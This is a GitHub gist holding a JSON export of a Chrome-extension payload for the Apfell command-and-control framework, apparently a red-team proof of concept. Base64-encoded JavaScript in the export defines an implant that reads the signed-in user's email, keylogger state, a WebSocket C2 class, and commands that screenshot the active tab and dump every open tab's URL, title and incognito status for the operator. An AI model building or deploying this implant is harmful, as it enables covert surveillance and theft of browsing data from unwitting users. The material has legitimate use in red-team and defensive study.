Skip to content

Instantly share code, notes, and snippets.

@xorrior

xorrior/chrome-extension-export-poc.json Secret

Created February 4, 2019 15:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save xorrior/e1d5b1efb59d27f30ea808fab4400df1 to your computer and use it in GitHub Desktop.
Save xorrior/e1d5b1efb59d27f30ea808fab4400df1 to your computer and use it in GitHub Desktop.
Download ZIP
Apfell payload export for chrome extension
Raw
chrome-extension-export-poc.json
{
"payload_types": [
{
"wrapper": false,
"command_template": "_command = function(){\n// Command code here\n}\n\nC2.commands[_command.name] = _command;",
"supported_os": "macOS (x86),macOS (x64),Windows (x86),Windows (x64)",
"execute_help": "",
"ptype": "chrome-extension",
"file_extension": ".js",
"wrapped_payload_type": "null",
"files": [
{
"chrome-extension.js": "Ly8tLS0tLS0tLS0tLS0tLUlNUExBTlQgSU5GT1JNQVRJT04tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpjbGFzcyBpbXBsYW50ewogICAgY29uc3RydWN0b3IoKXsKICAgICAgICB0aGlzLmhvc3RpbmZvID0gImNocm9tZSI7CiAgICAgICAgdGhpcy51c2VyaW5mbyA9ICcnOwogICAgICAgIHRoaXMucHJvY2luZm8gPSAwOwogICAgICAgIHRoaXMudXVpZCA9ICJVVUlEX0hFUkUiOwogICAgICAgIHRoaXMuYXBmZWxsaWQgPSAwOwogICAgfQp9CgphcGZlbGwgPSBuZXcgaW1wbGFudCgpOwovLy0tLS0tLS0tLS0tLS0tQmFzZSBDMiBJTkZPUk1BVElPTi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpjbGFzcyBiYXNlQzIgewogICAgY29uc3RydWN0b3IoaG9zdCwgcG9ydCwgZW5kcG9pbnQsIHNzbCwgaW50ZXJ2YWwpIHsKICAgICAgICB0aGlzLmhvc3QgPSBob3N0OwogICAgICAgIHRoaXMucG9ydCA9IHBvcnQ7CiAgICAgICAgdGhpcy5wcm90byA9ICcnOwogICAgICAgIHRoaXMuaW50ZXJ2YWwgPSBpbnRlcnZhbDsKICAgICAgICB0aGlzLmNvbW1hbmRzID0ge307CgogICAgICAgIGlmIChzc2wgPT09IHRydWUpIHsKICAgICAgICAgICAgdGhpcy5wcm90byA9ICd3c3M6Ly8nOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgIHRoaXMucHJvdG8gPSAnd3M6Ly8nOwogICAgICAgIH0KICAgICAgICB0aGlzLnNlcnZlciA9IGAke3RoaXMucHJvdG99JHt0aGlzLmhvc3R9OiR7dGhpcy5wb3J0fS8ke2VuZHBvaW50fWA7CiAgICB9CgogICAgZ2V0SW50ZXJ2YWwoKXsKICAgICAgICByZXR1cm4gdGhpcy5pbnRlcnZhbDsKICAgIH0KCiAgICBnZXRDb25maWcoKXsKICAgICAgICAvLyByZXR1cm4gdGhlIGMyIGNvbmZpZwogICAgfQoKICAgIHBvc3RSZXNwb25zZSgpewogICAgICAgIC8vb3V0cHV0IGEgcmVzcG9uc2UgdG8gYSB0YXNrCiAgICB9CiAgICBzZXRDb25maWcoKXsKICAgICAgICAvL05vdCBpbXBsZW1lbnRlZAogICAgfQogICAgZG93bmxvYWQoKXsKICAgICAgICAvL05vdCBJbXBsZW1lbnRlZAogICAgfQogICAgdXBsb2FkKCl7CiAgICAgICAgLy9Ob3QgaW1wbGVtZW50ZWQKICAgIH0KCiAgICBjaGVja0luKCl7CiAgICAgICAgLy8gcmVnaXN0ZXIgdGhpcyBjYWxsYmFjayB3aXRoIHRoZSBzZXJ2ZXIKICAgIH0KCiAgICBzZW5kUmVzcG9uc2UoKXsKICAgICAgICAvLyBTZW5kIGEgcmVzcG9uc2UgdG8gdGhlIHNlcnZlcgogICAgfQp9CgovLy0tLS0tLS0tLS0tLS1TSEFSRUQgQ09NTUFORCBDT0RFIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpsZXQga2V5bG9nVGFza0lEID0gMDsKbGV0IGtleWxvZ2dlcnMgPSBbXTsKCgpjaHJvbWUuaWRlbnRpdHkuZ2V0UHJvZmlsZVVzZXJJbmZvKGZ1bmN0aW9uKGluZm8pewogICAgYXBmZWxsLnVzZXJpbmZvID0gaW5mby5lbWFpbDsKfSk7Ci8vIEMyIFByb2ZpbGUgQ29kZQpDMlBST0ZJTEVfSEVSRQovLyBDb21tYW5kcwpDT01NQU5EU19IRVJF"
}
],
"c2_profiles": {},
"load_transforms": [],
"create_transforms": [],
"commands": [
{
"needs_admin": false,
"help_cmd": "screencapture",
"version": 2,
"description": "Capture a screenshot of the active tab",
"cmd": "screencapture",
"parameters": [],
"attack": [],
"artifacts": [],
"file": "c2NyZWVuY2FwdHVyZSA9IGZ1bmN0aW9uKHBhcmFtcyl7CiAgICBjaHJvbWUudGFicy5jYXB0dXJlVmlzaWJsZVRhYihudWxsLCBmdW5jdGlvbihpbWcpIHsKICAgICAgICAvLyBzZW5kIGJhY2sgdGhlIGJhc2U2NGVuY29kZWQgaW1hZ2UKICAgICAgICAvL2NvbnNvbGUubG9nKCdJbWFnZSAnK2ltZy50b1N0cmluZygpKTsKICAgICAgICBpZiAoaW1nID09PSB1bmRlZmluZWQpIHsKICAgICAgICAgICAgQzIuc2VuZEVycm9yKHRhc2tpZCwgdGFza3R5cGUpOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgIGxldCBlbmNJbWcgPSBpbWcudG9TdHJpbmcoKS5zcGxpdCgnLCcpWzFdOwogICAgICAgICAgICBjb25zdCBhcGZlbGxtc2cgPSBDcmVhdGVBcGZlbGxNZXNzYWdlKDIsIGFwZmVsbC5hcGZlbGxJRCwgYXBmZWxsLlVVSUQsIGVuY0ltZy5sZW5ndGgsIHRhc2tpZCwgdGFza3R5cGUsIGVuY0ltZyk7CiAgICAgICAgICAgIGxldCBtZXRhID0ge307CiAgICAgICAgICAgIG1ldGFbIm1ldGF0eXBlIl0gPSAzOwogICAgICAgICAgICBtZXRhWyJtZXRhZGF0YSJdID0gYXBmZWxsbXNnOwogICAgICAgICAgICBjb25zdCBtZXRhZW52ZWxvcGUgPSBKU09OLnN0cmluZ2lmeShtZXRhKTsKICAgICAgICAgICAgb3V0LnB1c2gobWV0YWVudmVsb3BlKTsKICAgICAgICB9CgogICAgfSk7Cn07CgpDMi5jb21tYW5kc1tzY3JlZW5jYXB0dXJlLm5hbWVdID0gc2NyZWVuY2FwdHVyZTsKQ09NTUFORF9FTkRTX0hFUkUK"
},
{
"needs_admin": false,
"help_cmd": "tabs",
"version": 2,
"description": "Dump tab information for all opened tabs",
"cmd": "tabs",
"parameters": [],
"attack": [],
"artifacts": [],
"file": "dGFicyA9IGZ1bmN0aW9uKHBhcmFtcykgewogICAgY29uc3QgcXVlcnlJbmZvID0ge307CiAgICBsZXQgdGFicyA9W107CiAgICBjaHJvbWUudGFicy5xdWVyeShxdWVyeUluZm8sIGZ1bmN0aW9uKHJlc3VsdCl7CiAgICAgICAgZm9yIChpID0gMDsgaSA8IHJlc3VsdC5sZW5ndGg7IGkrKykgewogICAgICAgICAgICBjb25zdCBpbmRpdmlkdWFsVGFiID0ge307CiAgICAgICAgICAgIGluZGl2aWR1YWxUYWIud2luZG93ID0gcmVzdWx0W2ldLnRpdGxlOwogICAgICAgICAgICBpbmRpdmlkdWFsVGFiLnVybCA9IHJlc3VsdFtpXS51cmw7CiAgICAgICAgICAgIGluZGl2aWR1YWxUYWIuaW5jb2duaXRvID0gcmVzdWx0W2ldLmluY29nbml0bzsKICAgICAgICAgICAgaW5kaXZpZHVhbFRhYi5pZCA9IHJlc3VsdFtpXS5pZDsKICAgICAgICAgICAgaW5kaXZpZHVhbFRhYi5hY3RpdmUgPSByZXN1bHRbaV0uYWN0aXZlOwogICAgICAgICAgICBpbmRpdmlkdWFsVGFiLmhpZ2hsaWdodGVkID0gcmVzdWx0W2ldLmhpZ2hsaWdodGVkOwogICAgICAgICAgICBpbmRpdmlkdWFsVGFiLndpbmRvd2lkID0gcmVzdWx0W2ldLndpbmRvd0lkOwoKICAgICAgICAgICAgdGFicy5wdXNoKGluZGl2aWR1YWxUYWIpOwogICAgICAgIH0KICAgICAgICBjb25zdCBkYXRhID0gYnRvYSh1bmVzY2FwZShlbmNvZGVVUklDb21wb25lbnQoSlNPTi5zdHJpbmdpZnkodGFicykpKSk7CiAgICAgICAgY29uc3QgYXBmZWxsTXNnID0gQ3JlYXRlQXBmZWxsTWVzc2FnZSgyLCBhcGZlbGwuYXBmZWxsSUQsIGFwZmVsbC5VVUlELCBkYXRhLmxlbmd0aCwgdGFza2lkLCB0YXNrdHlwZSwgZGF0YSk7CiAgICAgICAgbGV0IG1ldGEgPSB7fTsKICAgICAgICBtZXRhWyJtZXRhdHlwZSJdID0gMzsKICAgICAgICBtZXRhWyJtZXRhZGF0YSJdID0gYXBmZWxsTXNnOwogICAgICAgIGNvbnN0IG1ldGFlbnZlbG9wZSA9IEpTT04uc3RyaW5naWZ5KG1ldGEpOwogICAgICAgIG91dC5wdXNoKG1ldGFlbnZlbG9wZSk7CiAgICB9KTsKfTsKCkMyLmNvbW1hbmRzW3RhYnMubmFtZV0gPSB0YWJzOwpDT01NQU5EX0VORFNfSEVSRQo="
}
]
}
]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment